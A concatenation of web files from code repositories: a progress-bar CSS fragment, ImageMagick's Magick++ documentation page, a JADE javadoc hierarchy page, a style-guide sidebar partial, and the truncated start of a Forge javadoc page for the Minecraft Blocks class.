#XPProgressBar10_Right,
#XPProgressBar11_Right,
#XPProgressBar12_Right,
#XPProgressBar13_Right,
#XPProgressBar14_Right,
#XPProgressBar15_Right,
#XPProgressBar16_Right,
#XPProgressBar17_Right,
#XPProgressBar18_Right,
#XPProgressBar19_Right,
#XPProgressBar20_Right,
#XPProgressBar21_Right,
#XPProgressBar22_Right,
#XPProgressBar23_Right
{
background-color: gradient( linear, 0% 0%, 100% 0%, from( #222222FF ), to( black ) );
}
#XPProgressBarContainer0,
#XPProgressBarContainer1,
#XPProgressBarContainer2,
#XPProgressBarContainer3,
#XPProgressBarContainer4,
#XPProgressBarContainer5,
#XPProgressBarContainer6,
#XPProgressBarContainer7,
#XPProgressBarContainer8,
#XPProgressBarContainer9,
#XPProgressBarContainer10,
#XPProgressBarContainer11,
#XPProgressBarContainer12,
#XPProgressBarContainer13,
#XPProgressBarContainer14,
#XPProgressBarContainer15,
#XPProgressBarContainer16,
#XPProgressBarContainer17,
#XPProgressBarContainer18,
#XPProgressBarContainer19,
#XPProgressBarContainer20,
#XPProgressBarContainer21,
#XPProgressBarContainer22,
#XPProgressBarContainer23
{
vertical-align: bottom;
height: 40px;
width: 100%;
} |
output/build/imagemagick-6.7.8-8/www/magick++.html | twobob/buildroot-kindle |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html version="-//W3C//DTD XHTML 1.1//EN"
xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.w3.org/1999/xhtml
http://www.w3.org/MarkUp/SCHEMA/xhtml11.xsd">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<meta name="google-site-verification" content="MxsMq6bdLOx0KSuz1MY6yG9ZTIJ7_7DVRfl5NCAT5Yg"/>
<title>ImageMagick: Magick++, C++ API for ImageMagick</title>
<meta http-equiv="content-language" content="en-US"/>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv="reply-to" content="magick-users@imagemagick.org"/>
<meta name="application-name" content="ImageMagick"/>
<meta name="description" content="Use ImageMagick to convert, edit, or compose bitmap images in a variety of formats. In addition resize, rotate, shear, distort and transform images automagically."/>
<meta name="application-url" content="http://www.imagemagick.org"/>
<meta name="generator" content="PHP"/>
<meta name="keywords" content="magick++, c++, api, for, imagemagick, ImageMagick, PerlMagick, image processing, OpenMP, software development library, image, photo, software, Magick++, MagickWand"/>
<meta name="rating" content="GENERAL"/>
<meta name="robots" content="INDEX, FOLLOW"/>
<meta name="generator" content="ImageMagick Studio LLC"/>
<meta name="author" content="ImageMagick Studio LLC"/>
<meta name="revisit-after" content="2 DAYS"/>
<meta name="resource-type" content="document"/>
<meta name="copyright" content="Copyright (c) 1999-2012 ImageMagick Studio LLC"/>
<meta name="distribution" content="Global"/>
<link rel="icon" href="../images/wand.png"/>
<link rel="shortcut icon" href="../images/wand.ico" type="images/x-icon"/>
<link rel="canonical" href="http://www.imagemagick.org" />
<link rel="meta" type="application/rdf+xml" title="ICI" href="http://imagemagick.org/ici.rdf"/>
<!-- Add jQuery library -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js"></script>
<!-- Optionaly include easing and/or mousewheel plugins -->
<script type="text/javascript" src="http://www.imagemagick.org/fancybox/jquery.easing-1.3.pack.js"></script>
<script type="text/javascript" src="http://www.imagemagick.org/fancybox/jquery.mousewheel-3.0.6.pack.js"></script>
<!-- Add fancyBox -->
<link rel="stylesheet" href="http://www.imagemagick.org/fancybox/jquery.fancybox.css?v=2.0.4" type="text/css" media="screen" />
<script type="text/javascript" src="http://www.imagemagick.org/fancybox/jquery.fancybox.pack.js?v=2.0.4"></script>
<!-- Optionaly include button and/or thumbnail helpers -->
<link rel="stylesheet" href="http://www.imagemagick.org/fancybox/helpers/jquery.fancybox-buttons.css?v=2.0.4" type="text/css" media="screen" />
<script type="text/javascript" src="http://www.imagemagick.org/fancybox/helpers/jquery.fancybox-buttons.js?v=2.0.4"></script>
<link rel="stylesheet" href="http://www.imagemagick.org/fancybox/helpers/jquery.fancybox-thumbs.css?v=2.0.4" type="text/css" media="screen" />
<script type="text/javascript" src="http://www.imagemagick.org/fancybox/helpers/jquery.fancybox-thumbs.js?v=2.0.4"></script>
<script type="text/javascript">
$(document).ready(function() {
$(".fancybox").fancybox();
});
</script>
<!-- ImageMagick style -->
<link rel="stylesheet" href="http://www.google.com/cse/style/look/default.css" type="text/css" />
<style type="text/css" media="all">
@import url("../www/magick.css");
</style>
</head>
<body id="www-imagemagick-org">
<div class="titlebar">
<div style="margin: 17px auto; float: left;">
<script type="text/javascript">
<!--
google_ad_client = "pub-3129977114552745";
google_ad_slot = "5439289906";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>
<a href="../discourse-server">
<img src="../images/logo.jpg"
alt="ImageMagick Logo"
style="width: 123px; height: 118px; border: 0px; float: right;" /></a>
<a href="../index.html">
<img src="../images/sprite.jpg"
alt="ImageMagick Sprite"
style="width: 114px; height: 118px; border: 0px; float: right;" /></a>
</div>
<div class="westbar">
<div class="menu">
<a title="About ImageMagick" href="../index.html">About ImageMagick</a>
</div>
<div class="menu">
<a title="Binary Releases" href="binary-releases.html">Binary Releases</a>
</div>
<div class="sub">
<a title="Binary Release: Unix" href="binary-releases.html#unix">Unix</a>
</div>
<div class="sub">
<a title="Binary Release: MacOS X" href="binary-releases.html#macosx">Mac OS X</a>
</div>
<div class="sub">
<a title="Binary Release: iOS" href="binary-releases.html#iOS">iOS</a>
</div>
<div class="sub">
<a title="Binary Release: Windows" href="binary-releases.html#windows">Windows</a>
</div>
<div class="sep"></div>
<div class="menu">
<a title="Command-line Tools" href="command-line-tools.html">Command-line Tools</a>
</div>
<div class="sub">
<a title="Command-line Tools: Processing" href="command-line-processing.html">Processing</a>
</div>
<div class="sub">
<a title="Command-line Tools: Options" href="command-line-options.html">Options</a>
</div>
<div class="sub">
<a title="Command-line Tools: Usage" href="http://www.imagemagick.org/Usage/">Usage</a>
</div>
<div class="menu">
<a title="Program Interfaces" href="api.html">Program Interfaces</a>
</div>
<div class="sub">
<a title="Program Interface: MagickWand" href="magick-wand.html">MagickWand</a>
</div>
<div class="sub">
<a title="Program Interface: MagickCore" href="magick-core.html">MagickCore</a>
</div>
<div class="sub">
<a title="Program Interface: PerlMagick" href="perl-magick.html">PerlMagick</a>
</div>
<div class="sub">
<a title="Program Interface: Magick++" href="magick++.html">Magick++</a>
</div>
<div class="sep"></div>
<div class="menu">
<a title="Install from Source" href="install-source.html">Install from Source</a>
</div>
<div class="sub">
<a title="Install from Source: Unix" href="install-source.html#unix">Unix</a>
</div>
<div class="sub">
<a title="Install from Source: Windows" href="install-source.html#windows">Windows</a>
</div>
<div class="menu">
<a title="Resources" href="resources.html">Resources</a>
</div>
<div class="menu">
<a title="Architecture" href="architecture.html">Architecture</a>
</div>
<div class="menu">
<a title="Download" href="download.html">Download</a>
</div>
<div class="sep"></div>
<div class="menu">
<a title="Search" href="search.html">Search</a>
</div>
<div class="sep"></div>
<div class="menu">
<a title="Site Map" href="sitemap.html">Site Map</a>
</div>
<div class="sub">
<a title="Site Map: Links" href="links.html">Links</a>
</div>
<div class="sep"></div>
<div class="menu">
<a rel="follow" title="Sponsors" href="sponsors.html">Sponsors:</a>
<a href="http://www.networkredux.com"> <img src="../images/networkredux.png" width="140" height="31" alt="[sponsor]" style="margin-top: 4px; margin-left: 4px; border: 0px; float: left;" /></a>
<a href="http://www.dinodirect.com/ipads-tablets/"> <img src="../images/dino-direct.jpg" width="140" height="90" alt="[sponsor]" style="margin-top: 4px; margin-left: 4px; border: 0px; float: left;" /></a><!-- 201208010120 mickey@163... -->
<div class="sponsbox">
<div class="sponsor">
<a rel="follow" title="Sponsor: The Fastest & Easiest Way to Find Images" href="http://www.graphicsfactory.com">The Fastest & Easiest Way to Find Images</a><!-- 201210010270 graphicsfac... -->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: VPS" href="http://www.interdominios.com/vps">VPS</a><!-- 201209010090 barsh@inter... -->
</div>
<div class="sponsor">
<a rel="follow" title="Werbebanner Werbeplane" href="http://www.allesbanner.de">Werbebanner Werbeplane</a><!-- 201212010450 info@druck... -->
</div>
<div class="sponsor">
<a rel="follow" title="Entertainment News & Photos" href="http://www.zimbio.com">Entertainment News & Photos</a><!-- 201211010540 bd@zimb... -->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: LED24" href="http://led24.de/">LED24</a><!-- 201207010270 info@led24... -->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: Best Website Hosting" href="http://www.top-cheap-web-hosting.com">Best Website Hosting</a><!-- 201304010090 eunge.liu-->
</div>
<div class="sponsor">
<a rel="follow" title="Android Tablet" href="http://www.dinodirect.com/ipads-tablets/">Android Tablet</a><!-- 201208010120 mickey@163... -->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: Web Site Hosting" href="http://webhostinggeeks.com">Web Site Hosting</a><!-- 201302010900 funds@enmob... -->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: Premium Quality Stock Photos" href="http://www.f1online.pro/en/">Premium Quality Stock Photos</a><!-- 2012080100540 ... -->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: Druckerei" href="http://print24.com/de/">Druckerei</a><!-- 2012070100250 ... -->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: Managed Server" href="http://www.robhost.de">Managed Server</a><!-- 201210010720 klikics... -->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: Druckerei" href="http://www.allesdruck.de">Druckerei</a><!-- 201303011500 r.leo -->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: Names List" href="http://www.listofnames.info">Names List</a><!-- 2012110100180 grimshrat@busyb-->
</div>
<div class="sponsor">
<a rel="follow" title="Sponsor: Web Hosting" href="http://www.hostucan.com">Web Hosting</a><!-- 2012120100150 racent marketing@webhosting...-->
</div>
</div>
</div>
</div>
<div class="eastbar">
<div class="g-plusone" id="gplusone"></div>
<script type="text/javascript">
window.___gcfg = {
lang: 'en-US'
};
(function() {
var po = document.createElement('script');
po.type = 'text/javascript'; po.async = true;
po.src = 'https://apis.google.com/js/plusone.js';
var script = document.getElementsByTagName('script')[0];
script.parentNode.insertBefore(po, script);
})();
var gplusone = document.getElementById("gplusone");
gplusone.setAttribute("data-size","medium");
gplusone.setAttribute("data-count","false");
</script>
</div>
<div class="main">
<h1>Magick++ C++ API</h1>
<p class="navigation-index">[<a href="magick++.html#intro">Introduction to Magick++</a> • <a href="magick++.html#documentation">Documentation</a> • <a href="magick++.html#get">Obtaining Magick++</a> • <a href="magick++.html#install">Installation</a> • <a href="magick++.html#bugs">Reporting Bugs</a>]</p>
<div class="doc-section">
<a id="intro"></a>
<p>Magick++ is the object-oriented C++ API to the <a href="http://www.imagemagick.org/">ImageMagick</a> image-processing library.</p>
<p>Magick++ supports an object model which is inspired by <a href="perl-magick.html">PerlMagick</a>.
Images support implicit reference counting so that copy constructors
and assignment incur almost no cost. The cost of actually copying an
image (if necessary) is done just before modification and this copy
is managed automagically by Magick++. De-referenced copies are
automagically deleted. The image objects support value (rather than
pointer) semantics so it is trivial to support multiple generations
of an image in memory at one time.
</p>
<p>Magick++ provides integrated support for the <a href="http://www.sgi.com/tech/stl/">Standard
Template Library</a> (STL) so that the powerful containers available
(e.g. <a href="http://www.sgi.com/tech/stl/Deque.html">deque</a>,
<a href="http://www.sgi.com/tech/stl/Vector.html">vector</a>, <a href="http://www.sgi.com/tech/stl/List.html">list</a>,
and <a href="http://www.sgi.com/tech/stl/Map.html">map</a>) can
be used to write programs similar to those possible with PERL &
PerlMagick. STL-compatible template versions of ImageMagick's
list-style operations are provided so that operations may be
performed on multiple images stored in STL containers.
</p>
</div>
<h2>Documentation</h2>
<div class="doc-section">
<a id="documentation"></a>
<p>Detailed <a href="../www/Magick++/Documentation.html">documentation</a> is
provided for all Magick++ classes, class methods, and template
functions which comprise the API. See a <a href="http://www.imagemagick.org/Magick++/tutorial/Magick++_tutorial.pdf"> Gentle Introduction to Magick++</a> for an introductory tutorial to Magick++. We include the <a href="http://www.imagemagick.org/Magick++/tutorial/Magick++_tutorial.odt" >source</a> if you want to correct, enhance, or expand the tutorial.</p>
</div>
<h2>Obtaining Magick++</h2>
<a id="get"></a>
<div class="doc-section">
<p>Magick++ is included as part of <a href="../index.html">ImageMagick</a>
source releases and may be retrieved via <a href="download.html">ftp</a>
or <a href="subversion.html">Subversion</a>.
</p>
</div>
<h2>Installation</h2>
<div class="doc-section">
<a id="install"></a>
<p>Once you have the Magick++ sources available, follow these detailed
<a href="../www/Magick++/Install.html">installation instructions</a> for UNIX and
Windows.
</p>
</div>
<h2>Usage</h2>
<div class="doc-section">
<p>A helper script named <kbd>Magick++-config</kbd> is installed
under Unix which assists with recalling compilation options required
to compile and link programs which use Magick++. For example, the
following command will compile and link the source file <kbd>demo.cpp</kbd>
to produce the executable <kbd>demo</kbd> (notice that quotes are
backward quotes):
</p>
<pre class="text">
c++ `Magick++-config --cxxflags --cppflags` -O2 -o demo demo.cpp \
`Magick++-config --ldflags --libs`
</pre>
<p>Windows users may get started by manually editing a project file
for one of the Magick++ demo programs.
</p>
<p>Note, under Windows (and possibly the Mac) it may be necessary to initialize the ImageMagick library prior to using the Magick++ library. This initialization is performed by passing the path to the ImageMagick DLLs (assumed to be in the same directory as your program) to the InitializeMagick() function call. This is commonly performed by providing the path to your program (argv[0]) as shown in the following example: </p>
<pre class="text">
int main( int argc, char ** argv) {
InitializeMagick(*argv);
...
</pre>
<p>This initialization step is not required under Unix, Linux,
Cygwin, or any other operating environment that supports the notion
of <em>installing</em> ImageMagick in a known location.
</p>
</div>
<h2>Reporting Bugs</h2>
<div class="doc-section">
<a id="bugs"></a>
<p>Questions regarding usage should be directed to or to report any bugs go to
<a href="http://www.imagemagick.org/discourse-server/viewforum.php?f=23">Magick++ bug tracking forum</a>.
</p>
</div>
</div>
<div id="linkbar">
<span id="linkbar-west"> </span>
<span id="linkbar-center">
<a href="../discourse-server">Discourse Server</a> •
<a href="http://www.imagemagick.org/MagickStudio/scripts/MagickStudio.cgi">Studio</a>
</span>
<span id="linkbar-east"> </span>
</div>
<div class="footer">
<span id="footer-west">© 1999-2012 ImageMagick Studio LLC</span>
<span id="footer-east"> <a href="contact.html">Contact the Wizards</a></span>
</div>
<div style="clear: both; margin: 0; width: 100%; "></div>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-17690367-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</body>
</html>
|
doc/api/jade/util/package-tree.html | LeeboyOver9000/TCC | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="it">
<head>
<!-- Generated by javadoc (version 1.7.0_03) on Tue Dec 09 10:56:12 CET 2014 -->
<title>jade.util Class Hierarchy (JADE v4.3.3 API)</title>
<meta name="date" content="2014-12-09">
<link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="jade.util Class Hierarchy (JADE v4.3.3 API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-all.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../jade/proto/states/package-tree.html">Prev</a></li>
<li><a href="../../jade/util/leap/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../index.html?jade/util/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 class="title">Hierarchy For Package jade.util</h1>
<span class="strong">Package Hierarchies:</span>
<ul class="horizontal">
<li><a href="../../overview-tree.html">All Packages</a></li>
</ul>
</div>
<div class="contentContainer">
<h2 title="Class Hierarchy">Class Hierarchy</h2>
<ul>
<li type="circle">java.lang.Object
<ul>
<li type="circle">jade.util.<a href="../../jade/util/AccessControlList.html" title="class in jade.util"><span class="strong">AccessControlList</span></a></li>
<li type="circle">jade.util.<a href="../../jade/util/ClassFinder.html" title="class in jade.util"><span class="strong">ClassFinder</span></a></li>
<li type="circle">java.util.Dictionary<K,V>
<ul>
<li type="circle">java.util.Hashtable<K,V> (implements java.lang.Cloneable, java.util.Map<K,V>, java.io.Serializable)
<ul>
<li type="circle">java.util.Properties
<ul>
<li type="circle">jade.util.leap.<a href="../../jade/util/leap/Properties.html" title="class in jade.util.leap"><span class="strong">Properties</span></a> (implements jade.util.leap.<a href="../../jade/util/leap/Serializable.html" title="interface in jade.util.leap">Serializable</a>)
<ul>
<li type="circle">jade.util.<a href="../../jade/util/ExtendedProperties.html" title="class in jade.util"><span class="strong">ExtendedProperties</span></a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li type="circle">java.util.EventObject (implements java.io.Serializable)
<ul>
<li type="circle">jade.util.<a href="../../jade/util/Event.html" title="class in jade.util"><span class="strong">Event</span></a></li>
</ul>
</li>
<li type="circle">jade.util.<a href="../../jade/util/InputQueue.html" title="class in jade.util"><span class="strong">InputQueue</span></a></li>
<li type="circle">java.util.logging.Logger
<ul>
<li type="circle">jade.util.<a href="../../jade/util/Logger.html" title="class in jade.util"><span class="strong">Logger</span></a> (implements jade.util.leap.<a href="../../jade/util/leap/Serializable.html" title="interface in jade.util.leap">Serializable</a>)</li>
</ul>
</li>
<li type="circle">jade.util.<a href="../../jade/util/ThreadDumpManager.html" title="class in jade.util"><span class="strong">ThreadDumpManager</span></a></li>
<li type="circle">java.lang.Throwable (implements java.io.Serializable)
<ul>
<li type="circle">java.lang.Exception
<ul>
<li type="circle">java.lang.RuntimeException
<ul>
<li type="circle">jade.util.<a href="../../jade/util/PropertiesException.html" title="class in jade.util"><span class="strong">PropertiesException</span></a></li>
</ul>
</li>
<li type="circle">jade.util.<a href="../../jade/util/WrapperException.html" title="class in jade.util"><span class="strong">WrapperException</span></a></li>
</ul>
</li>
</ul>
</li>
<li type="circle">jade.util.<a href="../../jade/util/Toolkit.html" title="class in jade.util"><span class="strong">Toolkit</span></a></li>
<li type="circle">jade.util.<a href="../../jade/util/TransportAddressWrapper.html" title="class in jade.util"><span class="strong">TransportAddressWrapper</span></a></li>
</ul>
</li>
</ul>
<h2 title="Interface Hierarchy">Interface Hierarchy</h2>
<ul>
<li type="circle">jade.util.<a href="../../jade/util/Callback.html" title="interface in jade.util"><span class="strong">Callback</span></a><Result></li>
<li type="circle">jade.util.<a href="../../jade/util/ClassFinderFilter.html" title="interface in jade.util"><span class="strong">ClassFinderFilter</span></a></li>
<li type="circle">jade.util.<a href="../../jade/util/ClassFinderListener.html" title="interface in jade.util"><span class="strong">ClassFinderListener</span></a></li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li>Use</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-all.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../jade/proto/states/package-tree.html">Prev</a></li>
<li><a href="../../jade/util/leap/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../index.html?jade/util/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small><center>These are the official <i><a href=http://jade.tilab.com target=top>JADE</a></i> API. For these API backward compatibility is guaranteed accross JADE versions</center></small></p>
</body>
</html>
|
source/html/partials/molecules-page-sidebar.html | GC2018/styleguide | <div class="container">
<div class="row">
<div class="col-md-12 heading">
<h2>Sidebar</h2>
</div>
</div>
</div>
<div class="page-container with-sidebar container">
<div class="row">
<div class="col-md-3 hidden-on-mobile">
<div class="sidebar-wrapper">
<h3>About</h3>
<ul class="side-nav">
<li><a href="#">About us</a></li>
<li><a href="#">Ambassadors</a></li>
<li class="current"><a href="#">Sponsors</a></li>
<li><a href="#">Transport</a></li>
<li><a href="#">Our team</a></li>
<li><a href="#">Sustainability</a></li>
<li><a href="#">FAQs</a></li>
<li><a href="#">Contact</a></li>
</ul>
</div>
</div>
<div class="col-md-9">
<!-- YOUR PAGE CONTENT IS HERE -->
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-md-12 heading">
<h4>HTML</h4>
</div>
<div class="col-md-12 codes">
<pre class="prettyprint"><div class="page-container with-sidebar container">
<div class="row">
<div class="col-md-3 hidden-on-mobile">
<div class="sidebar-wrapper">
<h3>About</h3>
<ul class="side-nav">
<li><a href="#">About us</a></li>
<li><a href="#">Ambassadors</a></li>
<li class="current"><a href="#">Sponsors</a></li>
<li><a href="#">Transport</a></li>
<li><a href="#">Our team</a></li>
<li><a href="#">Sustainability</a></li>
<li><a href="#">FAQs</a></li>
<li><a href="#">Contact</a></li>
</ul>
</div>
</div>
<div class="col-md-9">
<!-- YOUR PAGE CONTENT IS HERE -->
</div>
</div>
</div></pre>
</div>
<div class="col-md-12 heading">
<h4>CSS/SCSS</h4>
</div>
<div class="col-md-12 codes">
<pre class="prettyprint">/*
from _section-page-container.scss
*/
.page-container {
font-family: "Lucida Grande";
padding-top: 60px;
padding-bottom: 60px;
.sidebar-wrapper {
background-color: #E6F6F9;
border-radius: 0 0 15px 0;
padding: 25px;
h3 {
margin: 0;
font-size: 18px;
font-weight: bold;
line-height: 32px;
}
ul.side-nav {
padding-left: 15px;
margin: 0;
padding-top: 20px;
li {
list-style: none;
a {
font-size: 18px;
line-height: 32px;
display: block;
font-weight: normal;
text-decoration: none;
background: none;
padding: 2px 0;
}
&.current {
a {
font-weight: bold;
text-decoration: underline;
}
}
}
}
}
}</pre>
</div>
</div>
</div>
|
1.7.10_Forge_Documents/net/minecraft/init/Blocks.html | Gullanshire/Minecraft_Mod-The_Exorcist | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_65) on Sun Jan 11 16:06:58 EST 2015 -->
<title>Blocks (Forge API)</title>
<meta name="date" content="2015-01-11">
<link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Blocks (Forge API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev Class</li>
<li><a href="../../../net/minecraft/init/Bootstrap.html" title="class in net.minecraft.init"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?net/minecraft/init/Blocks.html" target="_top">Frames</a></li>
<li><a href="Blocks.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#methods_inherited_from_class_java.lang.Object">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li>Method</li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">net.minecraft.init</div>
<h2 title="Class Blocks" class="title">Class Blocks</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>net.minecraft.init.Blocks</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<hr>
<br>
<pre>public class <span class="strong">Blocks</span>
extends java.lang.Object</pre>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- =========== FIELD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_summary">
<!-- -->
</a>
<h3>Field Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation">
<caption><span>Fields</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Field and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#acacia_stairs">acacia_stairs</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#activator_rail">activator_rail</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#air">air</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#anvil">anvil</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/BlockBeacon.html" title="class in net.minecraft.block">BlockBeacon</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#beacon">beacon</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#bed">bed</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#bedrock">bedrock</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../net/minecraft/block/Block.html" title="class in net.minecraft.block">Block</a></code></td>
<td class="colLast"><code><strong><a href="../../../net/minecraft/init/Blocks.html#birch_stairs">birch_stairs</a></strong></code> </td>
</tr>
<tr class="altColor">
